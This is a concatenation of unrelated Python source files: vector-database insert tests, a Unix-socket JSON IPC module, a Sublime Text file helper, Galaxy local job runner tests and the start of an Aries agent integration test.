# ids = future.result()
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 100000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
collection_new = gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
json_ipc.py
|
import os
import socket
import threading
import logging
import easilyb.json_serialize as json
logger = logging.getLogger(__name__)
BUFFER_SIZE = 4096
MAX_OBJECT_SIZE = 1024 * 1024 * 1024 # 1GB
DEFAULT_MAX_TRIES = 5
class JsonSocket(object):
def __init__(self, sock, max_tries=DEFAULT_MAX_TRIES):
self.sock = sock
self.max_tries = max_tries
def _send(self, data):
tries = 0
while tries < self.max_tries:
# Print('sending... ', end='')
self.sock.sendall(data.encode())
# Print('sent: ', data)
# Print('receiving... ', end='')
ret = self.sock.recv(1).decode()
# Print('received : ' + ret)
if ret == 'k':
return
elif ret == 'r':
pass
else:
raise IOError('Excpected k or r from peer')
tries += 1
def _send_fragmented(self, obj_ser, size):
tries = 0
fragement_size = BUFFER_SIZE - 2
while tries < self.max_tries:
self._send('s' + str(size) + '\\') # send size s555\
# print 's' + str(size) + '\\'
i = 0
while i < size:
self._send('c' + obj_ser[i:i + fragement_size] + '\\')
# print 'c' + str(len(obj_ser[i:i + fragement_size])) + '\\'
i += fragement_size
# Print('sending... ', end='')
self.sock.sendall(b'F\\')
# Print('sent F\\')
# print 'F\\'
# Print('receiving... ', end='')
ret = self.sock.recv(1).decode()
# Print('received : ' + ret)
if ret == 'K':
return
elif ret == 'R':
pass
else:
raise IOError('Excpected K or R from peer')
tries += 1
def send(self, obj):
# logger.debug("sending obj: %s", obj)
obj_ser = json.dumps(obj)
size = len(obj_ser)
tries = 0
if size > MAX_OBJECT_SIZE:
raise ValueError("Can't send all this data!")
try:
if size < BUFFER_SIZE - 2:
self._send('1' + obj_ser + '\\')
else:
self._send_fragmented(obj_ser, size)
except Exception:
# if tries > self.max_tries or not self.reconnect():
if tries > self.max_tries: #or not self.reconnect():
raise
else:
tries += 1
def receive(self):
state = 0
data = ''
size = 0
obj_ser = ''
obj = None
state2_tries = 0
state8_tries = 0
state12_tries = 0
while True:
if state == 0:
# Print('receiving... ', end='')
data = self.sock.recv(BUFFER_SIZE).decode()
# Print('received : ' + data)
if data.endswith('\\'):
state = 1
else:
state = 2
elif state == 1:
if data.startswith('1'):
state = 3
elif data.startswith('s'):
state = 4
else:
state = 2
elif state == 2:
if state2_tries < self.max_tries:
state2_tries += 1
# Print('sending... ', end='')
self.sock.sendall(b'r')
# Print('sent k')
state = 0
else:
raise IOError("Data malformated!")
elif state == 3:
obj_ser = data[1:-1]
try:
obj = json.loads(obj_ser)
state = 5
except:
state = 2
elif state == 4:
size = int(data[1:-1])
obj_ser = ''
# print 'received: s%d//' % (size)
# Print('sending... ', end='')
self.sock.sendall(b'k')
# Print('sent k')
state = 6
elif state == 5:
# Print('sending... ', end='')
self.sock.sendall(b'k')
# Print('sent k')
# logger.debug('received obj: %s', obj)
return obj
elif state == 6:
# Print('receiving... ', end='')
data = self.sock.recv(BUFFER_SIZE).decode()
# Print('received : ' + data)
if data.endswith('\\'):
state = 7
else:
state = 8
elif state == 7:
if data.startswith('c'):
# print 'received: c + %d'%(len(data)-2)
state = 9
elif data.startswith('F'):
# print 'received: F'
state = 10
else:
state = 8
elif state == 8:
if state8_tries < self.max_tries:
state8_tries += 1
# Print('sending... ', end='')
self.sock.sendall(b'r')
# Print('sent r')
state = 6
else:
raise IOError("Data malformated!")
elif state == 9:
obj_ser += data[1:-1]
# Print('sending... ', end='')
self.sock.sendall(b'k')
# Print('sent k')
state = 6
elif state == 10:
if size == len(obj_ser):
try:
obj = json.loads(obj_ser)
state = 11
except:
state = 12
else:
state = 12
elif state == 11:
# Print('sending... ', end='')
self.sock.sendall(b'K')
# Print('sent K')
# logger.debug('received obj: %s', obj)
return obj
elif state == 12:
if state12_tries < self.max_tries:
state12_tries += 1
# Print('sending... ', end='')
self.sock.sendall(b'R')
# Print('sent R')
state = 0
else:
raise IOError("Data malformated!")
def reconnect(self):
# logger.debug("reconnecting...")
return False
def close(self):
try:
self.sock.close()
except:
pass
finally:
self.sock = None
class JsonServerSocket(JsonSocket):
def __init__(self, server_address, callback):
self.server_address = server_address
self.callback = callback
super(JsonServerSocket, self).__init__(None) # does not work
# super(JsonServerSocket, self).__init__(socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)) # does not work
# super call:
# self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# self.max_tries = DEFAULT_MAX_TRIES
# end super call
def bind(self):
try:
os.unlink(self.server_address)
except OSError:
if os.path.exists(self.server_address):
raise
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.bind(self.server_address)
logger.info("binded to %s" % self.server_address)
self.sock.listen(1)
def accept(self):
connection, client_address = self.sock.accept()
logger.info("accepted connection from: %s", client_address)
return JsonConnection(connection, self.callback), client_address
def reconnect(self):
logger.debug("reconnecting...")
try:
self.close()
except:
pass
try:
self.bind()
return True
except:
return False
def close(self):
try:
os.unlink(self.server_address)
except:
pass
super(self, JsonServerSocket).close()
class JsonConnection(JsonSocket):
def __init__(self, connection, callback):
self.callback = callback
super(JsonConnection, self).__init__(connection) # does not work
def receive_call(self):
request = self.receive()
logger.debug("received request: %s", request)
if 'quit' in request:
self.close()
return False
function, args, kwargs = request['func'], request['args'], request['kwargs']
try:
ret = self.callback(function, args, kwargs)
response = {'return': ret}
logger.debug("sending response: %s", response)
self.send(response)
return True
except Exception as e:
response = {'exception': {"name": str(e.__class__), "msg": str(e)}}
logger.debug("sending response: %s", response)
self.send(response)
return True
class JsonClientSocket(JsonSocket):
def __init__(self, server_address):
self.server_address = server_address
super(JsonClientSocket, self).__init__(None) # # does not work
# super(JsonClientSocket, self).__init__(socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)) # # does not work
# self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def connect(self):
# logger.debug("connecting to: %s", self.server_address)
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.server_address)
logger.debug("connected to: %s", self.server_address)
def call_function(self, function, args=None, kwargs=None):
request = {'func': function, 'args': args or list(), 'kwargs':kwargs or dict()}
self.send(request)
response = self.receive()
logger.debug("received response: %s", response)
# TODO: receive logs
if 'exception' in response:
_raise_exception(response['exception'])
if 'return' in response:
return response['return']
def quit(self):
request = {'quit': ''}
self.send(request)
self.close()
def reconnect(self):
logger.debug("reconnecting...")
try:
self.quit()
except:
pass
try:
self.connect()
return True
except:
return False
class JsonServerMaster(threading.Thread):
def __init__(self, server_address, threaded=False):
self.server_address = server_address
self.threaded = threaded
self.server = JsonServerSocket(server_address, self.callback)
self.up = True
self.ipc_functions = dict()
super().__init__()
def ipc_function(self, f):
self.ipc_functions[f.__name__] = f
return f
def callback(self, func, args, kwargs):
try:
func_call = self.ipc_functions[func]
return func_call(*args, **kwargs)
except:
logger.error("Error calling function", exc_info=True)
raise
def run(self):
self.server.bind()
try:
while self.up:
try:
connection, client_address = self.server.accept()
if self.up:
self._process_connection(connection, client_address)
else:
connection.close()
except KeyboardInterrupt:
raise
except Exception as e:
logger.error("Error in control server: %s", e, exc_info=True)
finally:
try:
self.server.close()
except:
pass
def _process_connection(self, connection, client_address):
if self.threaded:
t = threading.Thread(target=self._process_connection_run, args=(connection, client_address))
t.setDaemon(True)
t.start()
else:
self._process_connection_run(connection, client_address)
def _process_connection_run(self, connection, client_address):
try:
while connection.receive_call():
pass
except KeyboardInterrupt:
self.stop()
except:
logger.error("Error in connection", exc_info=True)
finally:
try:
connection.close()
except:
pass
def stop(self):
if self.up:
self.up = False
# os.kill(os.getpid(), signal.SIGINT)
try:
client = JsonClientSocket(self.server_address)
client.connect()
# client.quit()
except:
pass
class JsonServerProxy:
def __init__(self, server_address):
self.client = JsonClientSocket(server_address)
self.client.connect()
def __getattribute__(self, item):
try:
return super().__getattribute__(item)
except:
return self.get_func(item)
def get_func(self, func):
def _call_func(*args, **kwargs):
return self.client.call_function(func, args, kwargs)
return _call_func
def quit(self):
self.client.quit()
def _raise_exception(exception_object):
exception_name, exception_msg = exception_object['name'], exception_object['msg']
if exception_name == 'ValueError':
raise ValueError(exception_msg)
elif exception_name == 'KeyError':
raise KeyError(exception_msg)
else:
raise Exception(exception_name + ": " + exception_msg)
|
file.py
|
import sublime
import threading
import yaml
import os
from contextlib import contextmanager
if 'syntax_file_map' not in globals():
syntax_file_map = {}
if 'determine_syntax_thread' not in globals():
determine_syntax_thread = None
def determine_syntax_files():
global determine_syntax_thread
if not syntax_file_map:
determine_syntax_thread = threading.Thread(
target=_determine_syntax_files)
determine_syntax_thread.start()
def _determine_syntax_files():
syntax_files = sublime.find_resources("*.sublime-syntax")
for syntax_file in syntax_files:
try:
# Use `sublime.load_resource`, in case Package is `*.sublime-package`.
resource = sublime.load_resource(syntax_file)
for extension in yaml.load(resource)["file_extensions"]:
if extension not in syntax_file_map:
syntax_file_map[extension] = []
extension_list = syntax_file_map[extension]
extension_list.append(syntax_file)
except Exception:
continue
def get_syntax_for_file(filename):
if not determine_syntax_thread or determine_syntax_thread.is_alive():
return "Packages/Text/Plain text.tmLanguage"
extension = get_file_extension(filename)
syntaxes = syntax_file_map.get(filename, None) or syntax_file_map.get(extension, None)
return syntaxes[-1] if syntaxes else "Packages/Text/Plain text.tmLanguage"
def get_file_extension(filename):
period_delimited_segments = filename.split(".")
return "" if len(period_delimited_segments) < 2 else period_delimited_segments[-1]
def get_file_contents_binary(repo_path, file_path):
"""
Given an absolute file path, return the binary contents of that file
as a string.
"""
file_path = os.path.join(repo_path, file_path)
with safe_open(file_path, "rb") as f:
binary = f.read()
binary = binary.replace(b"\r\n", b"\n")
binary = binary.replace(b"\r", b"")
return binary
def get_file_contents(repo_path, file_path):
"""
Given an absolute file path, return the text contents of that file
as a string.
"""
binary = get_file_contents_binary(repo_path, file_path)
try:
return binary.decode('utf-8')
except UnicodeDecodeError as unicode_err:
return binary.decode('latin-1')
@contextmanager
def safe_open(filename, mode, *args, **kwargs):
try:
with open(filename, mode, *args, **kwargs) as file:
yield file
except PermissionError as e:
sublime.ok_cancel_dialog("GitSavvy could not access file: \n{}".format(e))
raise e
except OSError as e:
sublime.ok_cancel_dialog("GitSavvy encountered an OS error: \n{}".format(e))
raise e
|
test_runner_local.py
|
import os
import threading
import time
from typing import Optional
from unittest import TestCase
import psutil
from galaxy import (
job_metrics,
model,
)
from galaxy.app_unittest_utils.tools_support import UsesTools
from galaxy.jobs.runners import local
from galaxy.util import bunch
class TestLocalJobRunner(TestCase, UsesTools):
def setUp(self):
self.setup_app()
self._init_tool()
self.app.job_metrics = job_metrics.JobMetrics()
self.job_wrapper = MockJobWrapper(self.app, self.test_directory, self.tool)
def tearDown(self):
self.tear_down_app()
def test_run(self):
self.job_wrapper.command_line = "echo HelloWorld"
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "HelloWorld"
def test_galaxy_lib_on_path(self):
self.job_wrapper.command_line = '''python -c "import galaxy.util"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 0
def test_default_slots(self):
self.job_wrapper.command_line = """echo $GALAXY_SLOTS"""
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "1"
def test_slots_override(self):
# Set local_slots in job destination to specify slots for
# local job runner.
self.job_wrapper.job_destination.params["local_slots"] = 3
self.job_wrapper.command_line = """echo $GALAXY_SLOTS"""
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "3"
def test_exit_code(self):
self.job_wrapper.command_line = '''sh -c "exit 4"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 4
def test_metadata_gets_set(self):
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_metadata_gets_set_if_embedded(self):
self.job_wrapper.job_destination.params["embed_metadata_in_job"] = "True"
# Kill off cruft for _handle_metadata_externally and make sure job stil works...
self.job_wrapper.external_output_metadata = None
self.app.datatypes_registry.set_external_metadata_tool = None
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_stopping_job(self):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner(self.app, 1)
def queue():
runner.queue_job(self.job_wrapper)
t = threading.Thread(target=queue)
t.start()
external_id = self.job_wrapper.wait_for_external_id()
assert psutil.pid_exists(external_id)
runner.stop_job(self.job_wrapper)
t.join(1)
assert not psutil.pid_exists(external_id)
def test_shutdown_no_jobs(self):
self.app.config.monitor_thread_join_timeout = 5
runner = local.LocalJobRunner(self.app, 1)
runner.start()
runner.shutdown()
def test_stopping_job_at_shutdown(self):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner(self.app, 1)
runner.start()
self.app.config.monitor_thread_join_timeout = 15
def queue():
runner.queue_job(self.job_wrapper)
t = threading.Thread(target=queue)
t.start()
external_id = self.job_wrapper.wait_for_external_id()
assert psutil.pid_exists(external_id)
runner.shutdown()
t.join(1)
assert not psutil.pid_exists(external_id)
assert "job terminated by Galaxy shutdown" in self.job_wrapper.fail_message
class MockJobWrapper:
def __init__(self, app, test_directory, tool):
working_directory = os.path.join(test_directory, "workdir")
tool_working_directory = os.path.join(working_directory, "working")
os.makedirs(tool_working_directory)
self.app = app
self.tool = tool
self.requires_containerization = False
self.state = model.Job.states.QUEUED
self.command_line = "echo HelloWorld"
self.environment_variables = []
self.commands_in_new_shell = False
self.prepare_called = False
self.dependency_shell_commands = None
self.working_directory = working_directory
self.tool_working_directory = tool_working_directory
self.requires_setting_metadata = True
self.job_destination = bunch.Bunch(id="default", params={})
self.galaxy_lib_dir = os.path.abspath("lib")
self.job = model.Job()
self.job_id = 1
self.job.id = 1
self.output_paths = ["/tmp/output1.dat"]
self.mock_metadata_path = os.path.abspath(os.path.join(test_directory, "METADATA_SET"))
self.metadata_command = "touch %s" % self.mock_metadata_path
self.galaxy_virtual_env = None
self.shell = "/bin/bash"
self.cleanup_job = "never"
self.tmp_dir_creation_statement = ""
self.use_metadata_binary = False
self.guest_ports = []
# Cruft for setting metadata externally, axe at some point.
self.external_output_metadata: Optional[bunch.Bunch] = bunch.Bunch(
set_job_runner_external_pid=lambda pid, session: None
)
self.app.datatypes_registry.set_external_metadata_tool = bunch.Bunch(build_dependency_shell_commands=lambda: [])
def check_tool_output(*args, **kwds):
return "ok"
def wait_for_external_id(self):
"""Test method for waiting until an external id has been registered."""
external_id = None
for _ in range(50):
external_id = self.job.job_runner_external_id
if external_id:
break
time.sleep(0.1)
return external_id
def prepare(self):
self.prepare_called = True
def set_external_id(self, external_id, **kwd):
self.job.job_runner_external_id = external_id
def get_command_line(self):
return self.command_line
def container_monitor_command(self, *args, **kwds):
return None
def get_id_tag(self):
return "1"
def get_state(self):
return self.state
def change_state(self, state, job=None):
self.state = state
@property
def job_io(self):
return bunch.Bunch(
get_output_fnames=lambda: [],
check_job_script_integrity=False,
check_job_script_integrity_count=0,
check_job_script_integrity_sleep=0,
)
def get_job(self):
return self.job
def setup_external_metadata(self, **kwds):
return self.metadata_command
def get_env_setup_clause(self):
return ""
def has_limits(self):
return False
def fail(self, message, exception):
self.fail_message = message
self.fail_exception = exception
def finish(self, stdout, stderr, exit_code, **kwds):
self.stdout = stdout
self.stderr = stderr
self.exit_code = exit_code
def tmp_directory(self):
return None
def home_directory(self):
return None
def reclaim_ownership(self):
pass
@property
def is_cwl_job(self):
return False
|
test_http_client_connection_to_aries_cloud_agent.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""End-to-end test for AEA connecting using HTTP Client connection, to an Aries Cloud Agent."""
import asyncio
import logging
import os
import shutil
import subprocess # nosec
import time
from threading import Thread
from typing import Optional
import pytest
import yaml
from aea import AEA_DIR
from aea.aea import AEA
from aea.configurations.base import (
ConnectionConfig,
ProtocolConfig,
ProtocolId,
SkillConfig,
)
from aea.configurations.constants import DEFAULT_LEDGER, DEFAULT_PRIVATE_KEY_FILE
from aea.crypto.wallet import Wallet
from aea.identity.base import Identity
from aea.mail.base import Envelope
from aea.protocols.base import Message, Protocol
from aea.registries.resources import Resources
from aea.skills.base import Handler, Skill, SkillContext
from packages.fetchai.connections.http_client.connection import HTTPClientConnection
from packages.fetchai.protocols.http.message import HttpMessage
from tests.conftest import HTTP_PROTOCOL_PUBLIC_ID
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
class TestAEAToACA:
"""End-to-end test for an AEA connecting to an ACA via the http client connection."""
@classmethod
def setup_class(cls):
"""Initialise the class."""
cls.aca_admin_address = "127.0.0.1"
cls.aca_admin_port = 8020
cls.aea_address = "some string"
